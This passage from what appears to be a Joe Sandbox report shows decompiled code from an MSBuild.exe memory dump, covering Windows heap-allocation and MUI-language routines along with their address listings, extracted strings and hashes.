                                            								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                            								__eflags = _t177;
                                            							}
                                            							_t154 = _t177;
                                            							 *(_t182 - 0x40) = _t177;
                                            							__eflags =  *(_t181 + 0x4c);
                                            							if( *(_t181 + 0x4c) != 0) {
                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                            								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                            								if(__eflags != 0) {
                                            									_push(_t154);
                                            									_t173 = _t177;
                                            									E010BFA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                            								}
                                            							}
                                            							__eflags =  *(_t177 + 2) & 0x00000002;
                                            							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                            								_t101 =  *(_t177 + 3);
                                            								 *(_t182 - 0x29) = _t101;
                                            								_t102 = _t101 & 0x000000ff;
                                            							} else {
                                            								_t130 = E01001F5B(_t177);
                                            								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                            								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                            								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                            									 *_t130 = 0;
                                            								} else {
                                            									_t131 = E010316C7(1, _t173);
                                            									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                            									 *_t165 = _t131;
                                            									_t130 = _t165;
                                            								}
                                            								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                            							}
                                            							 *(_t182 - 0x34) = _t102;
                                            							 *(_t182 - 0x28) = _t102;
                                            							__eflags =  *(_t181 + 0x4c);
                                            							if( *(_t181 + 0x4c) != 0) {
                                            								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                            								__eflags =  *_t177;
                                            							}
                                            							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                            							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                            								__eflags = 0;
                                            								E010C4496(_t181, 0);
                                            							}
                                            							__eflags =  *(_t182 - 0x24) -  *0x10f6360; // 0x0
                                            							_t104 =  *[fs:0x30];
                                            							if(__eflags != 0) {
                                            								_t105 =  *(_t104 + 0x68);
                                            								 *(_t182 - 0x4c) = _t105;
                                            								__eflags = _t105 & 0x00000800;
                                            								if((_t105 & 0x00000800) == 0) {
                                            									goto L49;
                                            								}
                                            								_t106 =  *(_t182 - 0x34);
                                            								__eflags = _t106;
                                            								if(_t106 == 0) {
                                            									goto L49;
                                            								}
                                            								__eflags = _t106 -  *0x10f6364; // 0x0
                                            								if(__eflags != 0) {
                                            									goto L49;
                                            								}
                                            								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x10f6366; // 0x0
                                            								if(__eflags != 0) {
                                            									goto L49;
                                            								}
                                            								_t108 =  *[fs:0x30];
                                            								__eflags =  *(_t108 + 0xc);
                                            								if( *(_t108 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(E010AD455(_t181,  *(_t182 - 0x28)));
                                            								_push( *(_t182 + 8));
                                            								E0100B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                            								goto L34;
                                            							} else {
                                            								__eflags =  *(_t104 + 0xc);
                                            								if( *(_t104 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E0100B150();
                                            								} else {
                                            									E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push( *(_t182 + 8));
                                            								E0100B150("Just allocated block at %p for %Ix bytes\n",  *0x10f6360);
                                            								L34:
                                            								_t112 =  *[fs:0x30];
                                            								__eflags =  *((char*)(_t112 + 2));
                                            								if( *((char*)(_t112 + 2)) != 0) {
                                            									 *0x10f6378 = 1;
                                            									 *0x10f60c0 = 0;
                                            									asm("int3");
                                            									 *0x10f6378 = 0;
                                            								}
                                            								goto L49;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					_t181 =  *0x10f5708; // 0x0
                                            					 *0x10fb1e0(__ecx, __edx,  *(_t182 + 8));
                                            					 *_t181();
                                            					L50:
                                            					return E0105D130(0, _t177, _t181);
                                            				}
                                            			}





















                                            0x010c2d82
                                            0x010c2d84
                                            0x010c2d89
                                            0x010c2d8e
                                            0x010c2d90
                                            0x010c2d92
                                            0x010c2d97
                                            0x010c2d9a
                                            0x010c2da4
                                            0x010c2dc0
                                            0x010c2dc3
                                            0x010c2dd1
                                            0x010c2dd6
                                            0x010c2dd8
                                            0x010c30a7
                                            0x010c30a7
                                            0x010c30aa
                                            0x010c30aa
                                            0x010c30ad
                                            0x010c30b4
                                            0x00000000
                                            0x010c30b9
                                            0x010c2de3
                                            0x010c2de8
                                            0x010c2deb
                                            0x010c2dee
                                            0x010c2df1
                                            0x010c2df3
                                            0x010c2dfb
                                            0x010c2dfb
                                            0x010c2df5
                                            0x010c2df5
                                            0x010c2df5
                                            0x010c2e04
                                            0x010c2e0a
                                            0x010c2e0d
                                            0x010c2e11
                                            0x010c2e11
                                            0x010c2e12
                                            0x010c2e15
                                            0x010c2e18
                                            0x010c2e1a
                                            0x010c3027
                                            0x010c3027
                                            0x010c302d
                                            0x010c3030
                                            0x010c304f
                                            0x010c3054
                                            0x010c3032
                                            0x010c3047
                                            0x010c304c
                                            0x010c305a
                                            0x010c3063
                                            0x00000000
                                            0x010c2e20
                                            0x010c2e20
                                            0x010c2e23
                                            0x00000000
                                            0x00000000
                                            0x010c2e29
                                            0x010c2e2b
                                            0x010c2e47
                                            0x010c2e2d
                                            0x010c2e33
                                            0x010c2e38
                                            0x010c2e3f
                                            0x010c2e42
                                            0x010c2e42
                                            0x010c2e4e
                                            0x010c2e5d
                                            0x010c2e5f
                                            0x010c2e62
                                            0x010c2e66
                                            0x010c2e6b
                                            0x010c2e6d
                                            0x00000000
                                            0x010c2e73
                                            0x010c2e73
                                            0x010c2e76
                                            0x010c2e7a
                                            0x010c2e83
                                            0x010c2e83
                                            0x010c2e83
                                            0x010c2e85
                                            0x010c2e87
                                            0x010c2e8a
                                            0x010c2e8d
                                            0x010c2e92
                                            0x010c2e9c
                                            0x010c2e9f
                                            0x010c2ea1
                                            0x010c2ea2
                                            0x010c2ea6
                                            0x010c2ea6
                                            0x010c2e9f
                                            0x010c2eab
                                            0x010c2eaf
                                            0x010c2edf
                                            0x010c2ee2
                                            0x010c2ee5
                                            0x010c2eb1
                                            0x010c2eb3
                                            0x010c2eb8
                                            0x010c2ebd
                                            0x010c2ec4
                                            0x010c2ed6
                                            0x010c2ec6
                                            0x010c2ec7
                                            0x010c2ecc
                                            0x010c2ecf
                                            0x010c2ed2
                                            0x010c2ed2
                                            0x010c2ed9
                                            0x010c2ed9
                                            0x010c2ee8
                                            0x010c2eeb
                                            0x010c2eef
                                            0x010c2ef2
                                            0x010c2efe
                                            0x010c2f04
                                            0x010c2f04
                                            0x010c2f04
                                            0x010c2f06
                                            0x010c2f0d
                                            0x010c2f0f
                                            0x010c2f13
                                            0x010c2f13
                                            0x010c2f1b
                                            0x010c2f21
                                            0x010c2f27
                                            0x010c2f95
                                            0x010c2f98
                                            0x010c2f9b
                                            0x010c2fa0
                                            0x00000000
                                            0x00000000
                                            0x010c2fa6
                                            0x010c2fa9
                                            0x010c2fac
                                            0x00000000
                                            0x00000000
                                            0x010c2fb2
                                            0x010c2fb9
                                            0x00000000
                                            0x00000000
                                            0x010c2fc3
                                            0x010c2fca
                                            0x00000000
                                            0x00000000
                                            0x010c2fd0
                                            0x010c2fd6
                                            0x010c2fd9
                                            0x010c2ff8
                                            0x010c2ffd
                                            0x010c2fdb
                                            0x010c2ff0
                                            0x010c2ff5
                                            0x010c300e
                                            0x010c300f
                                            0x010c301a
                                            0x00000000
                                            0x010c2f29
                                            0x010c2f29
                                            0x010c2f2c
                                            0x010c2f4b
                                            0x010c2f50
                                            0x010c2f2e
                                            0x010c2f43
                                            0x010c2f48
                                            0x010c2f56
                                            0x010c2f64
                                            0x010c2f6c
                                            0x010c2f6c
                                            0x010c2f72
                                            0x010c2f76
                                            0x010c2f7c
                                            0x010c2f83
                                            0x010c2f89
                                            0x010c2f8a
                                            0x010c2f8a
                                            0x00000000
                                            0x010c2f76
                                            0x010c2f27
                                            0x010c2e6d
                                            0x010c2da6
                                            0x010c2dab
                                            0x010c2db3
                                            0x010c2db9
                                            0x010c30bc
                                            0x010c30c1
                                            0x010c30c1

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            • API String ID: 0-1745908468
                                            • Opcode ID: dd489e1832ceb90eb531ba6c84cc3e07b16c33daaded0ecafbc22542697c1279
                                            • Instruction ID: fb0b503fbf4d13b19aec5c4647416b43b4a092c8bc3ca599d43485f8714fc501
                                            • Opcode Fuzzy Hash: dd489e1832ceb90eb531ba6c84cc3e07b16c33daaded0ecafbc22542697c1279
                                            • Instruction Fuzzy Hash: 2691FE31A10685DBDB22DFA8C451AEDBBF2FF58B10F18806DE5C5ABA91C7369841DF01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E01013D34(signed int* __ecx) {
                                            				signed int* _v8;
                                            				char _v12;
                                            				signed int* _v16;
                                            				signed int* _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int* _v48;
                                            				signed int* _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				char _v68;
                                            				signed int _t140;
                                            				signed int _t161;
                                            				signed int* _t236;
                                            				signed int* _t242;
                                            				signed int* _t243;
                                            				signed int* _t244;
                                            				signed int* _t245;
                                            				signed int _t255;
                                            				void* _t257;
                                            				signed int _t260;
                                            				void* _t262;
                                            				signed int _t264;
                                            				void* _t267;
                                            				signed int _t275;
                                            				signed int* _t276;
                                            				short* _t277;
                                            				signed int* _t278;
                                            				signed int* _t279;
                                            				signed int* _t280;
                                            				short* _t281;
                                            				signed int* _t282;
                                            				short* _t283;
                                            				signed int* _t284;
                                            				void* _t285;
                                            
                                            				_v60 = _v60 | 0xffffffff;
                                            				_t280 = 0;
                                            				_t242 = __ecx;
                                            				_v52 = __ecx;
                                            				_v8 = 0;
                                            				_v20 = 0;
                                            				_v40 = 0;
                                            				_v28 = 0;
                                            				_v32 = 0;
                                            				_v44 = 0;
                                            				_v56 = 0;
                                            				_t275 = 0;
                                            				_v16 = 0;
                                            				if(__ecx == 0) {
                                            					_t280 = 0xc000000d;
                                            					_t140 = 0;
                                            					L50:
                                            					 *_t242 =  *_t242 | 0x00000800;
                                            					_t242[0x13] = _t140;
                                            					_t242[0x16] = _v40;
                                            					_t242[0x18] = _v28;
                                            					_t242[0x14] = _v32;
                                            					_t242[0x17] = _t275;
                                            					_t242[0x15] = _v44;
                                            					_t242[0x11] = _v56;
                                            					_t242[0x12] = _v60;
                                            					return _t280;
                                            				}
                                            				if(E01011B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v56 = 1;
                                            					if(_v8 != 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                            					}
                                            					_v8 = _t280;
                                            				}
                                            				if(E01011B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v60 =  *_v8;
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                            					_v8 = _t280;
                                            				}
                                            				if(E01011B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            					L16:
                                            					if(E01011B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            						L28:
                                            						if(E01011B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                            							L46:
                                            							_t275 = _v16;
                                            							L47:
                                            							_t161 = 0;
                                            							L48:
                                            							if(_v8 != 0) {
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                            							}
                                            							_t140 = _v20;
                                            							if(_t140 != 0) {
                                            								if(_t275 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                            									_t275 = 0;
                                            									_v28 = 0;
                                            									_t140 = _v20;
                                            								}
                                            							}
                                            							goto L50;
                                            						}
                                            						_t167 = _v12;
                                            						_t255 = _v12 + 4;
                                            						_v44 = _t255;
                                            						if(_t255 == 0) {
                                            							_t276 = _t280;
                                            							_v32 = _t280;
                                            						} else {
                                            							_t276 = L01024620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                            							_t167 = _v12;
                                            							_v32 = _t276;
                                            						}
                                            						if(_t276 == 0) {
                                            							_v44 = _t280;
                                            							_t280 = 0xc0000017;
                                            							goto L46;
                                            						} else {
                                            							E0104F3E0(_t276, _v8, _t167);
                                            							_v48 = _t276;
                                            							_t277 = E01051370(_t276, 0xfe4e90);
                                            							_pop(_t257);
                                            							if(_t277 == 0) {
                                            								L38:
                                            								_t170 = _v48;
                                            								if( *_v48 != 0) {
                                            									E0104BB40(0,  &_v68, _t170);
                                            									if(L010143C0( &_v68,  &_v24) != 0) {
                                            										_t280 =  &(_t280[0]);
                                            									}
                                            								}
                                            								if(_t280 == 0) {
                                            									_t280 = 0;
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                            									_v44 = 0;
                                            									_v32 = 0;
                                            								} else {
                                            									_t280 = 0;
                                            								}
                                            								_t174 = _v8;
                                            								if(_v8 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                            								}
                                            								_v8 = _t280;
                                            								goto L46;
                                            							}
                                            							_t243 = _v48;
                                            							do {
                                            								 *_t277 = 0;
                                            								_t278 = _t277 + 2;
                                            								E0104BB40(_t257,  &_v68, _t243);
                                            								if(L010143C0( &_v68,  &_v24) != 0) {
                                            									_t280 =  &(_t280[0]);
                                            								}
                                            								_t243 = _t278;
                                            								_t277 = E01051370(_t278, 0xfe4e90);
                                            								_pop(_t257);
                                            							} while (_t277 != 0);
                                            							_v48 = _t243;
                                            							_t242 = _v52;
                                            							goto L38;
                                            						}
                                            					}
                                            					_t191 = _v12;
                                            					_t260 = _v12 + 4;
                                            					_v28 = _t260;
                                            					if(_t260 == 0) {
                                            						_t275 = _t280;
                                            						_v16 = _t280;
                                            					} else {
                                            						_t275 = L01024620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                            						_t191 = _v12;
                                            						_v16 = _t275;
                                            					}
                                            					if(_t275 == 0) {
                                            						_v28 = _t280;
                                            						_t280 = 0xc0000017;
                                            						goto L47;
                                            					} else {
                                            						E0104F3E0(_t275, _v8, _t191);
                                            						_t285 = _t285 + 0xc;
                                            						_v48 = _t275;
                                            						_t279 = _t280;
                                            						_t281 = E01051370(_v16, 0xfe4e90);
                                            						_pop(_t262);
                                            						if(_t281 != 0) {
                                            							_t244 = _v48;
                                            							do {
                                            								 *_t281 = 0;
                                            								_t282 = _t281 + 2;
                                            								E0104BB40(_t262,  &_v68, _t244);
                                            								if(L010143C0( &_v68,  &_v24) != 0) {
                                            									_t279 =  &(_t279[0]);
                                            								}
                                            								_t244 = _t282;
                                            								_t281 = E01051370(_t282, 0xfe4e90);
                                            								_pop(_t262);
                                            							} while (_t281 != 0);
                                            							_v48 = _t244;
                                            							_t242 = _v52;
                                            						}
                                            						_t201 = _v48;
                                            						_t280 = 0;
                                            						if( *_v48 != 0) {
                                            							E0104BB40(_t262,  &_v68, _t201);
                                            							if(L010143C0( &_v68,  &_v24) != 0) {
                                            								_t279 =  &(_t279[0]);
                                            							}
                                            						}
                                            						if(_t279 == 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                            							_v28 = _t280;
                                            							_v16 = _t280;
                                            						}
                                            						_t202 = _v8;
                                            						if(_v8 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                            						}
                                            						_v8 = _t280;
                                            						goto L28;
                                            					}
                                            				}
                                            				_t214 = _v12;
                                            				_t264 = _v12 + 4;
                                            				_v40 = _t264;
                                            				if(_t264 == 0) {
                                            					_v20 = _t280;
                                            				} else {
                                            					_t236 = L01024620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                            					_t280 = _t236;
                                            					_v20 = _t236;
                                            					_t214 = _v12;
                                            				}
                                            				if(_t280 == 0) {
                                            					_t161 = 0;
                                            					_t280 = 0xc0000017;
                                            					_v40 = 0;
                                            					goto L48;
                                            				} else {
                                            					E0104F3E0(_t280, _v8, _t214);
                                            					_t285 = _t285 + 0xc;
                                            					_v48 = _t280;
                                            					_t283 = E01051370(_t280, 0xfe4e90);
                                            					_pop(_t267);
                                            					if(_t283 != 0) {
                                            						_t245 = _v48;
                                            						do {
                                            							 *_t283 = 0;
                                            							_t284 = _t283 + 2;
                                            							E0104BB40(_t267,  &_v68, _t245);
                                            							if(L010143C0( &_v68,  &_v24) != 0) {
                                            								_t275 = _t275 + 1;
                                            							}
                                            							_t245 = _t284;
                                            							_t283 = E01051370(_t284, 0xfe4e90);
                                            							_pop(_t267);
                                            						} while (_t283 != 0);
                                            						_v48 = _t245;
                                            						_t242 = _v52;
                                            					}
                                            					_t224 = _v48;
                                            					_t280 = 0;
                                            					if( *_v48 != 0) {
                                            						E0104BB40(_t267,  &_v68, _t224);
                                            						if(L010143C0( &_v68,  &_v24) != 0) {
                                            							_t275 = _t275 + 1;
                                            						}
                                            					}
                                            					if(_t275 == 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                            						_v40 = _t280;
                                            						_v20 = _t280;
                                            					}
                                            					_t225 = _v8;
                                            					if(_v8 != 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                            					}
                                            					_v8 = _t280;
                                            					goto L16;
                                            				}
                                            			}










































                                            0x01013d3c
                                            0x01013d42
                                            0x01013d44
                                            0x01013d46
                                            0x01013d49
                                            0x01013d4c
                                            0x01013d4f
                                            0x01013d52
                                            0x01013d55
                                            0x01013d58
                                            0x01013d5b
                                            0x01013d5f
                                            0x01013d61
                                            0x01013d66
                                            0x01068213
                                            0x01068218
                                            0x01014085
                                            0x01014088
                                            0x0101408e
                                            0x01014094
                                            0x0101409a
                                            0x010140a0
                                            0x010140a6
                                            0x010140a9
                                            0x010140af
                                            0x010140b6
                                            0x010140bd
                                            0x010140bd
                                            0x01013d83
                                            0x0106821f
                                            0x01068229
                                            0x01068238
                                            0x01068238
                                            0x0106823d
                                            0x0106823d
                                            0x01013da0
                                            0x01013daf
                                            0x01013db5
                                            0x01013dba
                                            0x01013dba
                                            0x01013dd4
                                            0x01013e94
                                            0x01013eab
                                            0x01013f6d
                                            0x01013f84
                                            0x0101406b
                                            0x0101406b
                                            0x0101406e
                                            0x0101406e
                                            0x01014070
                                            0x01014074
                                            0x01068351
                                            0x01068351
                                            0x0101407a
                                            0x0101407f
                                            0x0106835d
                                            0x01068370
                                            0x01068377
                                            0x01068379
                                            0x0106837c
                                            0x0106837c
                                            0x0106835d
                                            0x00000000
                                            0x0101407f
                                            0x01013f8a
                                            0x01013f8d
                                            0x01013f90
                                            0x01013f95
                                            0x0106830d
                                            0x0106830f
                                            0x01013f9b
                                            0x01013fac
                                            0x01013fae
                                            0x01013fb1
                                            0x01013fb1
                                            0x01013fb6
                                            0x01068317
                                            0x0106831a
                                            0x00000000
                                            0x01013fbc
                                            0x01013fc1
                                            0x01013fc9
                                            0x01013fd7
                                            0x01013fda
                                            0x01013fdd
                                            0x01014021
                                            0x01014021
                                            0x01014029
                                            0x01014030
                                            0x01014044
                                            0x01014046
                                            0x01014046
                                            0x01014044
                                            0x01014049
                                            0x01068327
                                            0x01068334
                                            0x01068339
                                            0x0106833c
                                            0x0101404f
                                            0x0101404f
                                            0x0101404f
                                            0x01014051
                                            0x01014056
                                            0x01014063
                                            0x01014063
                                            0x01014068
                                            0x00000000
                                            0x01014068
                                            0x01013fdf
                                            0x01013fe2
                                            0x01013fe4
                                            0x01013fe7
                                            0x01013fef
                                            0x01014003
                                            0x01014005
                                            0x01014005
                                            0x0101400c
                                            0x01014013
                                            0x01014016
                                            0x01014017
                                            0x0101401b
                                            0x0101401e
                                            0x00000000
                                            0x0101401e
                                            0x01013fb6
                                            0x01013eb1
                                            0x01013eb4
                                            0x01013eb7
                                            0x01013ebc
                                            0x010682a9
                                            0x010682ab
                                            0x01013ec2
                                            0x01013ed3
                                            0x01013ed5
                                            0x01013ed8
                                            0x01013ed8
                                            0x01013edd
                                            0x010682b3
                                            0x010682b6
                                            0x00000000
                                            0x01013ee3
                                            0x01013ee8
                                            0x01013eed
                                            0x01013ef0
                                            0x01013ef3
                                            0x01013f02
                                            0x01013f05
                                            0x01013f08
                                            0x010682c0
                                            0x010682c3
                                            0x010682c5
                                            0x010682c8
                                            0x010682d0
                                            0x010682e4
                                            0x010682e6
                                            0x010682e6
                                            0x010682ed
                                            0x010682f4
                                            0x010682f7
                                            0x010682f8
                                            0x010682fc
                                            0x010682ff
                                            0x010682ff
                                            0x01013f0e
                                            0x01013f11
                                            0x01013f16
                                            0x01013f1d
                                            0x01013f31
                                            0x01068307
                                            0x01068307
                                            0x01013f31
                                            0x01013f39
                                            0x01013f48
                                            0x01013f4d
                                            0x01013f50
                                            0x01013f50
                                            0x01013f53
                                            0x01013f58
                                            0x01013f65
                                            0x01013f65
                                            0x01013f6a
                                            0x00000000
                                            0x01013f6a
                                            0x01013edd
                                            0x01013dda
                                            0x01013ddd
                                            0x01013de0
                                            0x01013de5
                                            0x01068245
                                            0x01013deb
                                            0x01013df7
                                            0x01013dfc
                                            0x01013dfe
                                            0x01013e01
                                            0x01013e01
                                            0x01013e06
                                            0x0106824d
                                            0x0106824f
                                            0x01068254
                                            0x00000000
                                            0x01013e0c
                                            0x01013e11
                                            0x01013e16
                                            0x01013e19
                                            0x01013e29
                                            0x01013e2c
                                            0x01013e2f
                                            0x0106825c
                                            0x0106825f
                                            0x01068261
                                            0x01068264
                                            0x0106826c
                                            0x01068280
                                            0x01068282
                                            0x01068282
                                            0x01068289
                                            0x01068290
                                            0x01068293
                                            0x01068294
                                            0x01068298
                                            0x0106829b
                                            0x0106829b
                                            0x01013e35
                                            0x01013e38
                                            0x01013e3d
                                            0x01013e44
                                            0x01013e58
                                            0x010682a3
                                            0x010682a3
                                            0x01013e58
                                            0x01013e60
                                            0x01013e6f
                                            0x01013e74
                                            0x01013e77
                                            0x01013e77
                                            0x01013e7a
                                            0x01013e7f
                                            0x01013e8c
                                            0x01013e8c
                                            0x01013e91
                                            0x00000000
                                            0x01013e91

                                            Strings
                                            • Kernel-MUI-Language-Disallowed, xrefs: 01013E97
                                            • WindowsExcludedProcs, xrefs: 01013D6F
                                            • Kernel-MUI-Language-SKU, xrefs: 01013F70
                                            • Kernel-MUI-Language-Allowed, xrefs: 01013DC0
                                            • Kernel-MUI-Number-Allowed, xrefs: 01013D8C
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: 1b6470a94870581cba874155955354f34a50588ae3c4e5149f9c9a78a5f1a887
                                            • Instruction ID: 3f84dac8d148c95bf04815688ddeefe9b3bd5b6eb786a16caa05f0e5193083d7
                                            • Opcode Fuzzy Hash: 1b6470a94870581cba874155955354f34a50588ae3c4e5149f9c9a78a5f1a887
                                            • Instruction Fuzzy Hash: D7F14CB2D00619EBCB11DF99C980AEEBBF9FF18750F1440AAE985E7255D7749E00CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 29%
                                            			E010040E1(void* __edx) {
                                            				void* _t19;
                                            				void* _t29;
                                            
                                            				_t28 = _t19;
                                            				_t29 = __edx;
                                            				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push("HEAP: ");
                                            						E0100B150();
                                            					} else {
                                            						E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0100B150("Invalid heap signature for heap at %p", _t28);
                                            					if(_t29 != 0) {
                                            						E0100B150(", passed to %s", _t29);
                                            					}
                                            					_push("\n");
                                            					E0100B150();
                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            						 *0x10f6378 = 1;
                                            						asm("int3");
                                            						 *0x10f6378 = 0;
                                            					}
                                            					return 0;
                                            				}
                                            				return 1;
                                            			}





                                            0x010040e6
                                            0x010040e8
                                            0x010040f1
                                            0x0106042d
                                            0x0106044c
                                            0x01060451
                                            0x0106042f
                                            0x01060444
                                            0x01060449
                                            0x0106045d
                                            0x01060466
                                            0x0106046e
                                            0x01060474
                                            0x01060475
                                            0x0106047a
                                            0x0106048a
                                            0x0106048c
                                            0x01060493
                                            0x01060494
                                            0x01060494
                                            0x00000000
                                            0x0106049b
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                            • API String ID: 0-188067316
                                            • Opcode ID: 0a9da623c4c1a944838426f10cc3cbc5931c6b416fc0cc2efee280710d868d43
                                            • Instruction ID: 83661982cbefd1ecf38885a12a6ac5f992121ca92bf1c9b017e5d308639bdea7
                                            • Opcode Fuzzy Hash: 0a9da623c4c1a944838426f10cc3cbc5931c6b416fc0cc2efee280710d868d43
                                            • Instruction Fuzzy Hash: 45014C76144685DEF2369769E40EFD67BE8DB90F70F188079F0849B6C1CEA9D440D211
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E0102A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                            				void* _v5;
                                            				signed short _v12;
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				signed short _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				signed short _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				signed short* _v52;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				signed int _t131;
                                            				signed char _t134;
                                            				signed int _t138;
                                            				char _t141;
                                            				signed short _t142;
                                            				void* _t146;
                                            				signed short _t147;
                                            				intOrPtr* _t149;
                                            				intOrPtr _t156;
                                            				signed int _t167;
                                            				signed int _t168;
                                            				signed short* _t173;
                                            				signed short _t174;
                                            				intOrPtr* _t182;
                                            				signed short _t184;
                                            				intOrPtr* _t187;
                                            				intOrPtr _t197;
                                            				intOrPtr _t206;
                                            				intOrPtr _t210;
                                            				signed short _t211;
                                            				intOrPtr* _t212;
                                            				signed short _t214;
                                            				signed int _t216;
                                            				intOrPtr _t217;
                                            				signed char _t225;
                                            				signed short _t235;
                                            				signed int _t237;
                                            				intOrPtr* _t238;
                                            				signed int _t242;
                                            				unsigned int _t245;
                                            				signed int _t251;
                                            				intOrPtr* _t252;
                                            				signed int _t253;
                                            				intOrPtr* _t255;
                                            				signed int _t256;
                                            				void* _t257;
                                            				void* _t260;
                                            
                                            				_t256 = __edx;
                                            				_t206 = __ecx;
                                            				_t235 = _a4;
                                            				_v44 = __ecx;
                                            				_v24 = _t235;
                                            				if(_t235 == 0) {
                                            					L41:
                                            					return _t131;
                                            				}
                                            				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                            				if(_t251 == 0) {
                                            					__eflags =  *0x10f8748 - 1;
                                            					if( *0x10f8748 >= 1) {
                                            						__eflags =  *(__edx + 2) & 0x00000008;
                                            						if(( *(__edx + 2) & 0x00000008) == 0) {
                                            							_t110 = _t256 + 0xfff; // 0xfe7
                                            							__eflags = (_t110 & 0xfffff000) - __edx;
                                            							if((_t110 & 0xfffff000) != __edx) {
                                            								_t197 =  *[fs:0x30];
                                            								__eflags =  *(_t197 + 0xc);
                                            								if( *(_t197 + 0xc) == 0) {
                                            									_push("HEAP: ");
